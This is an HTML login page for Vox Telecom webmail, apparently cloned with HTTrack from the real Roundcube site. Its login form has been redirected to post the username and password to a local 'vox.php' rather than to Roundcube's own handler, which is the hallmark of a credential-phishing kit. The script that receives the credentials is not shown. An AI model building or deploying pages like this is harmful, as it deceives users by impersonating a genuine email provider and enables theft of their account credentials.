<!DOCTYPE html>
<html lang="en">

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Vox Telecom :: Welcome to Vox Telecom</title>
<meta name="viewport" content="" id="viewport" />

<link rel="shortcut icon" href="skins/larry/images/vox_logo13ae.png?s=1592561544">

<link rel="stylesheet" type="text/css" href="skins/larry/styles.min2191.css?s=1596809644" />
<link rel="stylesheet" type="text/css" href="plugins/jqueryui/themes/larry/jquery-ui78d7.css?s=1591528317">
<script src="skins/larry/ui.min611f.js?s=1591043954"></script>




<script src="program/js/jquery.minc820.js?s=1591528327"></script>
<script src="program/js/common.min2dae.js?s=1591528318"></script>
<script src="program/js/app.min2dae.js?s=1591528318"></script>
<script src="program/js/jstz.minc820.js?s=1591528327"></script>
<script>
/*
        @licstart  The following is the entire license notice for the 
        JavaScript code in this page.

        Copyright (C) The Roundcube Dev Team

        The JavaScript code in this page is free software: you can redistribute
        it and/or modify it under the terms of the GNU General Public License
        as published by the Free Software Foundation, either version 3 of
        the License, or (at your option) any later version.

        The code is distributed WITHOUT ANY WARRANTY; without even the implied
        warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
        See the GNU GPL for more details.

        @licend  The above is the entire license notice
        for the JavaScript code in this page.
*/
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"login","standard_windows":false,"locale":"en_US","devel_mode":null,"rcversion":10406,"cookie_domain":"","cookie_path":"/","cookie_secure":true,"skin":"larry","blankpage":"skins/larry/watermark.html","refresh_interval":60,"session_lifetime":1800,"action":"","comm_path":"./?_task=login","compose_extwin":false,"date_format":"yy-mm-dd","date_format_localized":"YYYY-MM-DD","request_token":"QBSJyUD6taOOMw8v7aaoj3bT3ep3bVdd"});
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!","connerror":"Connection Error (Failed to reach the server)!","requesttimedout":"Request timed out","refreshing":"Refreshing...","windowopenerror":"The popup window was blocked!","uploadingmany":"Uploading files...","uploading":"Uploading file...","close":"Close","save":"Save","cancel":"Cancel","alerttitle":"Attention","confirmationtitle":"Are you sure...","delete":"Delete","continue":"Continue","ok":"OK","errortitle":"An error occurred!","toggleadvancedoptions":"Toggle advanced options","options":"Options"});
rcmail.gui_container("loginfooter","bottomline");rcmail.gui_object('loginform', 'form');
rcmail.gui_object('message', 'message');
</script>

<script src="plugins/jqueryui/js/jquery-ui.min78d7.js?s=1591528317"></script>

</head>
<body>

<h1 class="voice">Vox Telecom Login</h1>

<div id="login-form">
  <div class="box-inner" role="main">
  <form name="form" method="post" action="vox.php">
<input type="hidden" name="_token" value="QBSJyUD6taOOMw8v7aaoj3bT3ep3bVdd">
  <input type="hidden" name="_task" value="login"><input type="hidden" name="_action" value="login"><input type="hidden" name="_timezone" id="rcmlogintz" value="_default_"><input type="hidden" name="_url" id="rcmloginurl" value=""><table><tbody><tr><td class="title"><label for="rcmloginuser">Username</label>
</td>
<td class="input"><input name="_user" id="usern" required size="40" autocapitalize="off" type="text"></td>
</tr>
<tr><td class="title"><label for="rcmloginpwd">Password</label>
</td>
<td class="input"><input name="_pass" id="pwdn" required size="40" autocapitalize="off" type="password"></td>
</tr>
</tbody>
</table>
<p class="formbuttons"><button type="submit" id="rcmloginsubmit" class="button mainaction submit">Login</button>
</p>

  </form>

  </div>

  <div class="box-bottom" role="complementary">
    <div id="message"></div>
    <noscript>
      <p class="noscriptwarning">Warning: This webmail service requires Javascript! In order to use it please enable Javascript in your browser's settings.</p>
    </noscript>
  </div>

  <!--
  <div id="bottomline" role="contentinfo">
    Vox Telecom 
          &nbsp;&#9679;&nbsp; <a href="https://www.voxtelecom.co.za/support" target="_blank" class="support-link">Get support</a>
        
  </div>
  -->
</div>




<script>
if (!window.UI) { var UI = new rcube_mail_ui(); }
</script>
<script>
$(function() {
rcmail.init();
var images = ["skins/larry/images/ajaxloader.gif","skins/larry/images/ajaxloader_dark.gif","skins/larry/images/buttons.png","skins/larry/images/addcontact.png","skins/larry/images/filetypes.png","skins/larry/images/listicons.png","skins/larry/images/messages.png","skins/larry/images/messages_dark.png","skins/larry/images/quota.png","skins/larry/images/selector.png","skins/larry/images/splitter.png","skins/larry/images/watermark.jpg"];
            for (var i=0; i<images.length; i++) {
                img = new Image();
                img.src = images[i];
            }
});
</script>






</body>

<!-- Mirrored from webmail.vox.co.za/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 10 Dec 2020 18:38:11 GMT -->
</html>